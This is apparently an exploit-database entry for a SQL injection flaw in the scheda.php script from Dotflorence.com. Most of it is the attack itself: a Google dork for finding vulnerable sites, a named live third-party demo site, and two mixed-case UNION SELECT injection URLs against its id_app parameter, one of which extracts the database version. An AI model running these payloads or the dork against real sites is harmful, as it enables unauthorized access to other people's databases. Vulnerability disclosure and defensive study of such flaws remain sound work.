The scheda.php script provided by Dotflorence.com suffers from a remote SQL injection vulnerability.
e57b55f5f1ba9ced6e34fe9100e4f976cb9ba520ecc6d5a65bacc69b4dc2e3fc
# Exploit Title: Dotflorence.com SQL Injection Vulnerability
# Google Dork: Powered By dotflorence.com
# Author: Lazmania61 | Code Hunters
#Demo : http://www.florenceandtuscany.it/
# Tested on: Windows 7
# Greetz : HeRoTuRk , Err0r , Darkknight , Bug Researchers Members
# http://www.florenceandtuscany.it/scheda.php?id_app=-1%20uNIon%20SeLect%201,2,3,4,5,6--
# http://www.florenceandtuscany.it/scheda.php?id_app=-1%20uNIon%20SeLect%201,@@VERSIOn,3,4,5,6--